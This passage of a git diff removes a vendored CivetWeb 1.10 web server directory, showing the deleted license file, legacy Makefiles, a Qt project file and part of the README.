-* valenok
-
diff --git a/thirdparty/civetweb-1.10/LICENSE.md b/thirdparty/civetweb-1.10/LICENSE.md
deleted file mode 100644
index be6ae19..0000000
--- a/thirdparty/civetweb-1.10/LICENSE.md
+++ /dev/null
@@ -1,208 +0,0 @@
-ALL LICENSES
-=====
-
-This document includes several copyright licenses for different
-aspects of the software.  Not all licenses may apply depending
-on the features chosen.
-
-
-Civetweb License
------
-
-### Included with all features.
-
-> Copyright (c) 2013-2017 The CivetWeb developers ([CREDITS.md](https://github.com/civetweb/civetweb/blob/master/CREDITS.md))
->
-> Copyright (c) 2004-2013 Sergey Lyubka
->
-> Copyright (c) 2013 No Face Press, LLC (Thomas Davis)
->
-> Copyright (c) 2013 F-Secure Corporation
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Lua License
-------
-
-### Included only if built with Lua support.
-
-http://www.lua.org/license.html
-
-> Copyright (C) 1994-2015 Lua.org, PUC-Rio.
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-SQLite3 License
-------
-
-### Included only if built with Lua and SQLite support.
-
-http://www.sqlite.org/copyright.html
-
-> 2001 September 15
->
-> The author disclaims copyright to this source code.  In place of
-> a legal notice, here is a blessing:
->
->    May you do good and not evil.
->    May you find forgiveness for yourself and forgive others.
->    May you share freely, never taking more than you give.
-
-
-lsqlite3 License
-------
-
-### Included only if built with Lua and SQLite support.
-
-> Copyright (C) 2002-2013 Tiago Dionizio, Doug Currie
-> All rights reserved.
-> Author    : Tiago Dionizio <tiago.dionizio@ist.utl.pt>
-> Author    : Doug Currie <doug.currie@alum.mit.edu>
-> Library   : lsqlite3 - a SQLite 3 database binding for Lua 5
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Lua File System License
-------
-
-### Included only if built with Lua support.
-
-http://keplerproject.github.io/luafilesystem/license.html
-
-> Copyright © 2003 Kepler Project.
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-LuaXML License
-------
-
-### Included only if built with Lua and LuaXML support.
-
-> LuaXML License
->
-> LuaXml is licensed under the terms of the MIT license reproduced below,
-> the same as Lua itself. This means that LuaXml is free software and can be
-> used for both academic and commercial purposes at absolutely no cost.
->
-> Copyright (C) 2007-2013 Gerald Franz, eludi.net
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Duktape License
-------
-
-### Included only if built with Duktape support.
-
-https://github.com/svaarala/duktape/blob/master/LICENSE.txt
-
-> ===============
-> Duktape license
-> ===============
-> 
-> (http://opensource.org/licenses/MIT)
-> 
-> Copyright (c) 2013-2015 by Duktape authors (see AUTHORS.rst)
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
diff --git a/thirdparty/civetweb-1.10/Makefile.deprecated b/thirdparty/civetweb-1.10/Makefile.deprecated
deleted file mode 100644
index 288c15b..0000000
--- a/thirdparty/civetweb-1.10/Makefile.deprecated
+++ /dev/null
@@ -1,208 +0,0 @@
-# This Makefile is part of Civetweb web server project,
-# https://github.com/valenok/civetweb
-#
-# Example custom build:
-# COPT="-g -O0 -DNO_SSL_DL -DUSE_LUA -llua -lcrypto -lssl" make linux
-#
-# Flags are:
-# -DHAVE_MD5              - use system md5 library (-2kb)
-# -DNDEBUG                - strip off all debug code (-5kb)
-# -DDEBUG                 - build debug version (very noisy) (+7kb)
-# -DNO_CGI                - disable CGI support (-5kb)
-# -DNO_SSL                - disable SSL functionality (-2kb)
-# -DNO_SSL_DL             - link against system libssl library (-1kb)
-# -DCONFIG_FILE=\"file\"  - use `file' as the default config file
-# -DSSL_LIB=\"libssl.so.<version>\"   - use system versioned SSL shared object
-# -DCRYPTO_LIB=\"libcrypto.so.<version>\" - use system versioned CRYPTO so
-# -DUSE_LUA               - embed Lua in Civetweb (+100kb)
-
-PROG        = civetweb
-CFLAGS      = -std=c99 -O2 -W -Wall -pedantic -pthread -pipe -Iinclude $(COPT)
-
-# To build with Lua, download and unzip Lua 5.2.3 source code into the
-# civetweb directory, and then add $(LUA_SOURCES) to CFLAGS
-LUA         = src/third_party/lua-5.2.3/src
-LUA_FLAGS   = -I$(LUA) -DLUA_COMPAT_ALL
-LUA_SOURCES = $(LUA)/lapi.c $(LUA)/lcode.c $(LUA)/lctype.c \
-              $(LUA)/ldebug.c $(LUA)/ldo.c $(LUA)/ldump.c \
-              $(LUA)/lfunc.c $(LUA)/lgc.c $(LUA)/llex.c \
-              $(LUA)/lmem.c $(LUA)/lobject.c $(LUA)/lopcodes.c \
-              $(LUA)/lparser.c $(LUA)/lstate.c $(LUA)/lstring.c \
-              $(LUA)/ltable.c $(LUA)/ltm.c $(LUA)/lundump.c \
-              $(LUA)/lvm.c $(LUA)/lzio.c $(LUA)/lauxlib.c \
-              $(LUA)/lbaselib.c $(LUA)/lbitlib.c $(LUA)/lcorolib.c \
-              $(LUA)/ldblib.c $(LUA)/liolib.c $(LUA)/lmathlib.c \
-              $(LUA)/loslib.c $(LUA)/lstrlib.c $(LUA)/ltablib.c \
-              $(LUA)/loadlib.c $(LUA)/linit.c
-LUA_WINOBJS = $(LUA_SOURCES:%.c=%.obj)
-
-ifneq ($(OS), Windows_NT)
-  LUA_FLAGS += -DLUA_USE_DLOPEN
-endif
-
-LIB_SOURCES = src/civetweb.c
-
-ALL_SOURCES = src/main.c $(LIB_SOURCES) src/third_party/sqlite3.c src/third_party/lsqlite3.c src/third_party/lfs.c \
-              $(LUA_SOURCES) $(YASSL_SOURCES)
-
-SQLITE_FLAGS = -DTHREADSAFE=1 -DSQLITE_ENABLE_FTS3 -DSQLITE_ENABLE_FTS3_PARENTHESIS
-CIVETWEB_FLAGS = -DUSE_LUA -DUSE_LUA_SQLITE3 -DUSE_LUA_FILE_SYSTEM $(COPT)
-FLAGS = $(CIVETWEB_FLAGS) $(SQLITE_FLAGS) $(LUA_FLAGS)
-
-
-# Stock windows binary builds with Lua. 
-# Yassl has a GPL license, so we will leave it out by default.
-
-ifeq ($(WITH_YASSL), 1)
-YASSL       = ../cyassl-2.4.6
-YASSL_FLAGS = -I $(YASSL) -I $(YASSL)/cyassl \
-              -D _LIB -D OPENSSL_EXTRA -D HAVE_ERRNO_H \
-              -D HAVE_GETHOSTBYNAME -D HAVE_INET_NTOA -D HAVE_LIMITS_H \
-              -D HAVE_MEMSET -D HAVE_SOCKET -D HAVE_STDDEF_H -D HAVE_STDLIB_H \
-              -D HAVE_STRING_H -D HAVE_SYS_STAT_H -D HAVE_SYS_TYPES_H
-YASSL_SOURCES = \
-  $(YASSL)/src/internal.c $(YASSL)/src/io.c $(YASSL)/src/keys.c \
-  $(YASSL)/src/ssl.c $(YASSL)/src/tls.c $(YASSL)/ctaocrypt/src/hmac.c \
-  $(YASSL)/ctaocrypt/src/random.c $(YASSL)/ctaocrypt/src/sha.c \
-  $(YASSL)/ctaocrypt/src/sha256.c $(YASSL)/ctaocrypt/src/logging.c \
-  $(YASSL)/ctaocrypt/src/error.c $(YASSL)/ctaocrypt/src/rsa.c \
-  $(YASSL)/ctaocrypt/src/des3.c $(YASSL)/ctaocrypt/src/asn.c \
-  $(YASSL)/ctaocrypt/src/coding.c $(YASSL)/ctaocrypt/src/arc4.c \
-  $(YASSL)/ctaocrypt/src/md4.c $(YASSL)/ctaocrypt/src/md5.c \
-  $(YASSL)/ctaocrypt/src/dh.c $(YASSL)/ctaocrypt/src/dsa.c \
-  $(YASSL)/ctaocrypt/src/pwdbased.c $(YASSL)/ctaocrypt/src/aes.c \
-  $(YASSL)/ctaocrypt/src/md2.c $(YASSL)/ctaocrypt/src/ripemd.c \
-  $(YASSL)/ctaocrypt/src/sha512.c $(YASSL)/src/sniffer.c \
-  $(YASSL)/ctaocrypt/src/rabbit.c $(YASSL)/ctaocrypt/src/misc.c \
-  $(YASSL)/ctaocrypt/src/tfm.c $(YASSL)/ctaocrypt/src/integer.c \
-  $(YASSL)/ctaocrypt/src/ecc.c $(YASSL)/src/ocsp.c $(YASSL)/src/crl.c \
-  $(YASSL)/ctaocrypt/src/hc128.c $(YASSL)/ctaocrypt/src/memory.c
-  
-  ALL_SOURCES += $(YASSL_SOURCES)
-  FLAGS += $(YASSL_FLAGS) -DNO_SSL_DL
-  CIVETWEB_FLAGS += -DNO_SSL_DL 
-
-else
-#  FLAGS += -DNO_SSL
-#  CIVETWEB_FLAGS += -DNO_SSL 
-endif
-
-ALL_OBJECTS = $(ALL_SOURCES:%.c=%.o)
-ALL_WINOBJS = $(ALL_SOURCES:%.c=%.obj)
-
-
-# Using Visual Studio 6.0. To build Civetweb:
-#  Set MSVC variable below to where VS 6.0 is installed on your system
-#  Run "PATH_TO_VC6\bin\nmake windows"
-MSVC = ../vc6
-#DBG = /Zi /Od
-DBG  = /DNDEBUG /O1
-CL   = $(MSVC)/bin/cl /MD /TC /nologo $(DBG) /W3 /GA /I$(MSVC)/include
-LINK = $(MSVC)/bin/link /incremental:no /libpath:$(MSVC)/lib /machine:IX86 \
-       user32.lib shell32.lib comdlg32.lib ws2_32.lib advapi32.lib
-
-all:
-	@echo "make (linux|bsd|solaris|mac|windows|mingw|cygwin)"
-
-%.obj: %.c
-	$(CL) /c $(FLAGS) /Fo$@ $<
-
-%.o: %.c
-	$(CC) -o $@ $< -c $(FLAGS) $(CFLAGS)
-
-# Lua library for Windows
-lua.lib: $(LUA_WINOBJS)
-	$(MSVC)/bin/lib /out:$@ $(LUA_WINOBJS)
-
-# To build with Lua, make sure you have Lua unpacked into src/third_party/lua-5.2.3 directory
-linux_lua: $(ALL_OBJECTS)
-	$(CC) $(ALL_OBJECTS) -o $(PROG) -ldl
-
-civetweb.o: src/mod_lua.inl
-
-# Make sure that the compiler flags come last in the compilation string.
-# If not so, this can break some on some Linux distros which use
-# "-Wl,--as-needed" turned on by default  in cc command.
-# Also, this is turned in many other distros in static linkage builds.
-linux:
-	$(CC) $(LIB_SOURCES) src/main.c -o $(PROG) -ldl $(CFLAGS)
-
-mac: bsd
-bsd:
-	$(CC) $(LIB_SOURCES) src/main.c -o $(PROG) $(CFLAGS)
-
-bsd_lua: $(ALL_OBJECTS)
-	$(CC) $(ALL_OBJECTS) -o $@
-
-solaris:
-	$(CC) $(LIB_SOURCES) src/main.c -lnsl -lsocket -o $(PROG) $(CFLAGS)
-
-lib$(PROG).a: $(ALL_OBJECTS)
-	ar cr $@ $(ALL_OBJECTS)
-
-$(PROG).lib: $(ALL_WINOBJS)
-	$(MSVC)/bin/lib /out:$@ $(ALL_WINOBJS)
-
-# For codesign to work in non-interactive mode, unlock login keychain:
-# security unlock ~/Library/Keychains/login.keychain
-# See e.g. http://lists.apple.com/archives/apple-cdsa/2008/Jan/msg00027.html
-Civetweb: $(LIB_SOURCES) src/main.c
-	$(CC) $(LIB_SOURCES) src/main.c src/third_party/lsqlite3.c src/third_party/sqlite3.c src/third_party/lfs.c \
-          -DUSE_COCOA $(CFLAGS) $(FLAGS) -mmacosx-version-min=10.4 \
-          $(YASSL_SOURCES) $(LUA_SOURCES) \
-          -framework Cocoa -ObjC -arch i386 -arch x86_64 -o Civetweb
-
-cocoa: Civetweb
-	V=`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`; DIR=dmg/Civetweb.app && rm -rf $$DIR && mkdir -p $$DIR/Contents/{MacOS,Resources} && install -m 644 resources/civetweb_*.png resources/civetweb.icns $$DIR/Contents/Resources/ && install -m 644 resources/Info.plist $$DIR/Contents/ && install -m 755 Civetweb $$DIR/Contents/MacOS/ && ln -fs /Applications dmg/ ; hdiutil create Civetweb_$$V.dmg -volname "Civetweb $$V" -srcfolder dmg -ov #; rm -rf dmg
-
-un:
-	$(CC) test/unit_test.c -o unit_test -I. -I$(LUA) $(LUA_SOURCES) \
-          $(CFLAGS) -g -O0
-	./unit_test
-
-wi:
-	$(CL) test/unit_test.c $(LUA_SOURCES) $(LUA_FLAGS) \
-          $(YASSL_SOURCES) $(YASSL_FLAGS) /I. /DNO_SSL_DL \
-          /link /libpath:$(MSVC)/lib advapi32.lib /out:unit_test.exe
-	./unit_test.exe
-
-windows: $(ALL_WINOBJS)
-	$(MSVC)/bin/rc resources/res.rc
-	$(LINK) /nologo $(ALL_WINOBJS) resources/res.res /out:$(PROG).exe
-
-# Build for Windows under MinGW
-#MINGWDBG= -DDEBUG -O0 -ggdb
-MINGWDBG= -DNDEBUG -Os
-MINGWOPT=  -W -Wall -mthreads -Wl,--subsystem,console $(MINGWDBG) -DHAVE_STDINT $(GCC_WARNINGS) $(COPT)
-mingw:
-	windres resources\res.rc resources\res.o
-	$(CC) $(MINGWOPT) $(LIB_SOURCES) -lws2_32 \
-		-shared -Wl,--out-implib=$(PROG).lib -o $(PROG).dll
-	$(CC) $(MINGWOPT) $(LIB_SOURCES) src/main.c resources\res.o \
-	-lws2_32 -ladvapi32 -lcomdlg32 -o $(PROG).exe
-
-# Build for Windows under Cygwin
-#CYGWINDBG= -DDEBUG -O0 -ggdb
-CYGWINDBG= -DNDEBUG -Os
-CYGWINOPT=  -W -Wall -mthreads -Wl,--subsystem,console $(CYGWINDBG) -DHAVE_STDINT $(GCC_WARNINGS) $(COPT)
-cygwin:
-	windres ./resources/res.rc ./resources/res.o
-	$(CC) $(CYGWINOPT) $(LIB_SOURCES) -lws2_32 \
-		-shared -Wl,--out-implib=$(PROG).lib -o $(PROG).dll
-	$(CC) $(CYGWINOPT) -Iinclude $(LIB_SOURCES) src/main.c ./resources/res.o \
-	-lws2_32 -ladvapi32 -o $(PROG).exe
-
-tests:
-	perl test/test.pl $(TEST)
-
-tarball: clean
-	F=civetweb-`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`.tgz ; cd .. && tar -czf x civetweb/{LICENSE.md,Makefile,examples,test,resources,*.[ch],*.md} && mv x civetweb/$$F
-
-release: tarball cocoa
-	wine make windows
-	V=`perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h`; upx civetweb.exe; cp civetweb.exe civetweb-$$V.exe; cp civetweb.exe civetweb_php_bundle/; zip -r civetweb_php_bundle_$$V.zip civetweb_php_bundle/
-
-clean:
-	rm -rf *.o *.core $(PROG) *.obj *.so $(PROG).txt *.dSYM *.tgz \
-	$(PROG).exe *.dll *.lib resources/res.o resources/res.RES *.dSYM *.zip *.pdb \
-	*.exe *.dmg $(ALL_OBJECTS) $(ALL_WINOBJS)
diff --git a/thirdparty/civetweb-1.10/Makefile.osx b/thirdparty/civetweb-1.10/Makefile.osx
deleted file mode 100644
index 44260e8..0000000
--- a/thirdparty/civetweb-1.10/Makefile.osx
+++ /dev/null
@@ -1,42 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# For codesign to work in non-interactive mode, unlock login keychain:
-# security unlock ~/Library/Keychains/login.keychain
-# See e.g. http://lists.apple.com/archives/apple-cdsa/2008/Jan/msg00027.html
-
-# Civetweb features
-WITH_LUA = 1
-
-PACKAGE = Civetweb
-BUILD_DIR = out
-
-CFLAGS += -DUSE_COCOA -DENABLE_CREATE_CONFIG_FILE -mmacosx-version-min=10.4 -ObjC -arch i386 -arch x86_64
-LDFLAGS += -framework Cocoa
-
-DMG_DIR = $(BUILD_DIR)/dmg
-CONTENTS_DIR = $(DMG_DIR)/$(PACKAGE).app/Contents
-RESOURCES_DIR = $(CONTENTS_DIR)/Resources
-OSXBIN_DIR = $(CONTENTS_DIR)/MacOS
-
-CIVETWEB_VERSION = $(shell perl -lne '/define\s+CIVETWEB_VERSION\s+"(\S+)"/ and print $$1' include/civetweb.h)
-ZIPFILENAME = $(PACKAGE)-$(CIVETWEB_VERSION).zip
-
-include Makefile
-
-package: build
-	@rm -rf $(DMG_DIR)
-	install -d -m 755 $(CONTENTS_DIR) $(RESOURCES_DIR) $(OSXBIN_DIR)
-	install -m 644 resources/Info.plist $(CONTENTS_DIR)/
-	install -m 644 resources/civetweb_*.png resources/civetweb.icns $(RESOURCES_DIR)/
-	install -m 644 resources/itworks.html $(OSXBIN_DIR)/index.html
-	install -m 644 resources/civetweb_64x64.png $(OSXBIN_DIR)/
-	install -m 755 $(CPROG) $(OSXBIN_DIR)/$(PACKAGE)
-	install -m 644 docs/Installing.md $(DMG_DIR)/Installing.txt
-	install -m 644 LICENSE.md $(DMG_DIR)/License.txt
-	rm -rf $(ZIPFILENAME)
-	cd $(DMG_DIR) && zip -r ../../$(ZIPFILENAME) .
-
-.PHONY: package
diff --git a/thirdparty/civetweb-1.10/Qt/CivetWeb.pro b/thirdparty/civetweb-1.10/Qt/CivetWeb.pro
deleted file mode 100644
index 6d5e1a2..0000000
--- a/thirdparty/civetweb-1.10/Qt/CivetWeb.pro
+++ /dev/null
@@ -1,34 +0,0 @@
-TEMPLATE = app
-CONFIG += console
-CONFIG -= app_bundle
-CONFIG -= qt
-
-SOURCES += \
-    ../src/md5.inl \
-    ../src/sha1.inl \
-    ../src/handle_form.inl \
-    ../src/mod_lua.inl \
-    ../src/mod_duktape.inl \
-    ../src/timer.inl \
-    ../src/civetweb.c \
-    ../src/main.c
-
-#include(deployment.pri)
-#qtcAddDeployment()
-
-HEADERS += \
-    ../include/civetweb.h
-
-INCLUDEPATH +=  \
-    ../include/
-
-win32 {
-LIBS += -lws2_32 -lComdlg32 -lUser32 -lShell32 -lAdvapi32
-} else {
-LIBS += -lpthread -ldl -lm
-}
-
-
-DEFINES += USE_IPV6
-DEFINES += USE_WEBSOCKET
-DEFINES += USE_SERVER_STATS
diff --git a/thirdparty/civetweb-1.10/README.md b/thirdparty/civetweb-1.10/README.md
deleted file mode 100644
index 4a334ca..0000000
--- a/thirdparty/civetweb-1.10/README.md
+++ /dev/null
@@ -1,168 +0,0 @@
-![CivetWeb](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/civetweb_64x64.png "CivetWeb") CivetWeb
-=======
-
-**The official home of CivetWeb is [https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)**
-
-[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT)
-[![GitHub contributors](https://img.shields.io/github/contributors/civetweb/civetweb.svg)](https://github.com/civetweb/civetweb/blob/master/CREDITS.md)
-
-Continuous integration for Linux and OSX ([Travis CI](https://travis-ci.org/civetweb/civetweb)):
-
-[![Travis Build Status](https://travis-ci.org/civetweb/civetweb.svg?branch=master)](https://travis-ci.org/civetweb/civetweb)
-
-Continuous integration for Windows ([AppVeyor](https://ci.appveyor.com/project/civetweb/civetweb)):
-
-[![Appveyor Build Status](https://ci.appveyor.com/api/projects/status/github/civetweb/civetweb?svg=true)](https://ci.appveyor.com/project/civetweb/civetweb/branch/master)
-
-Test coverage check ([coveralls](https://coveralls.io/github/civetweb/civetweb), [codecov](https://codecov.io/gh/civetweb/civetweb/branch/master)) (currently in a setup and evaluation phase):
-
-[![Coveralls](https://img.shields.io/coveralls/civetweb/civetweb.svg?maxAge=3600)]()
-[![Coverage Status](https://coveralls.io/repos/github/civetweb/civetweb/badge.svg?branch=master)](https://coveralls.io/github/civetweb/civetweb?branch=master)
-
-[![codecov](https://codecov.io/gh/civetweb/civetweb/branch/master/graph/badge.svg)](https://codecov.io/gh/civetweb/civetweb)
-
-
-
-Static source code analysis ([Coverity](https://scan.coverity.com/projects/5784)):
-
-[![Coverity Scan Build Status](https://scan.coverity.com/projects/5784/badge.svg)](https://scan.coverity.com/projects/5784)
-
-
-
-Project Mission
------------------
-
-Project mission is to provide easy to use, powerful, C/C++ embeddable web
-server with optional CGI, SSL and Lua support.
-CivetWeb has a MIT license so you can innovate without restrictions.
-
-CivetWeb can be used by developers as a library, to add web server functionality to an existing application.
-It can also be used by end users as a stand-alone web server. It is available as single executable, no installation is required.
-
-
-Where to find the official version?
------------------------------------
-
-End users can download CivetWeb releases at SourceForge
-[https://sourceforge.net/projects/civetweb/](https://sourceforge.net/projects/civetweb/)
-
-Developers can contribute to CivetWeb via GitHub
-[https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb)
-
-Trouble tickets should be filed on GitHub
-[https://github.com/civetweb/civetweb/issues](https://github.com/civetweb/civetweb/issues)
-
-Announcements are at Google Groups
-[https://groups.google.com/d/forum/civetweb](https://groups.google.com/d/forum/civetweb). Some older support and discussion threads are there as well. However, recently support questions and discussions are usually [GitHub issues](https://github.com/civetweb/civetweb/issues).
-
-Source releases can be found on GitHub
-[https://github.com/civetweb/civetweb/releases](https://github.com/civetweb/civetweb/releases)
-
-A very brief overview can be found on GitHub Pages
-[http://civetweb.github.io/civetweb/](http://civetweb.github.io/civetweb/)
-
-
-Quick start documentation
---------------------------
-
-- [docs/Installing.md](https://github.com/civetweb/civetweb/blob/master/docs/Installing.md) - Install Guide (for end users using pre-built binaries)
-- [docs/UserManual.md](https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md) - End User Guide
-- [docs/Building.md](https://github.com/civetweb/civetweb/blob/master/docs/Building.md) - Building the Server (quick start guide)
-- [docs/Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) - Embedding (how to add HTTP support to an existing application)
-- [docs/OpenSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/OpenSSL.md) - Adding HTTPS (SSL/TLS) support using OpenSSL.
-- [API documentation](https://github.com/civetweb/civetweb/tree/master/docs/api) - Additional documentation on the civetweb application programming interface ([civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)).
-- [RELEASE_NOTES.md](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md) - Release Notes
-- [LICENSE.md](https://github.com/civetweb/civetweb/blob/master/LICENSE.md) - Copyright License
-
-
-Overview
---------
-
-CivetWeb keeps the balance between functionality and
-simplicity by a carefully selected list of features:
-
-- Liberal, commercial-friendly, permissive,
-  [MIT license](http://en.wikipedia.org/wiki/MIT_License)
-- Free from copy-left licenses, like GPL, because you should innovate without
-  restrictions.
-- Forked from [Mongoose](https://code.google.com/p/mongoose/) in 2013, before
-  it changed the licence from MIT to commercial + GPL. A lot of enchancements
-  have been added since that time, see
-  [RELEASE_NOTES.md](https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md).
-- Works on Windows, Mac, Linux, UNIX, iPhone, Android, Buildroot, and many
-  other platforms.
-- Scripting and database support (Lua scipts, Lua Server Pages, CGI + SQLite
-  database, Server side javascript).
-  This provides a ready to go, powerful web development platform in a one
-  single-click executable with **no dependencies**.
-- Support for CGI, HTTPS (SSL/TLS), SSI, HTTP digest (MD5) authorization, Websocket,
-  WEbDAV.
-- Optional support for authentication using client side X.509 certificates.
-- Resumed download, URL rewrite, file blacklist, IP-based ACL, Windows service.
-- Download speed limit based on client subnet or URI pattern.
-- Simple and clean embedding API.
-- The source is in single file to make things easy.
-- Embedding examples included.
-- HTTP client capable of sending arbitrary HTTP/HTTPS requests.
-- Websocket client functionality available (WS/WSS).
-
-
-### Optionally included software
-
-[![Lua](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/lua-logo.jpg "Lua Logo")](http://lua.org)
-
-[![Sqlite3](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/sqlite3-logo.jpg "Sqlite3 Logo")](http://sqlite.org)
-
-[![LuaFileSystem](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luafilesystem-logo.jpg "LuaFileSystem Logo")](http://keplerproject.github.io/luafilesystem/)
-
-[![LuaSQLite3](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luasqlite-logo.jpg "LuaSQLite3 Logo")](http://lua.sqlite.org/index.cgi/index)
-
-[![LuaXML](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/luaxml-logo.jpg "LuaXML Logo")](http://viremo.eludi.net/LuaXML/index.html)
-
-[![Duktape](https://raw.githubusercontent.com/civetweb/civetweb/master/resources/duktape-logo.png "Duktape Logo")](http://duktape.org)
-
-
-Support
--------
-
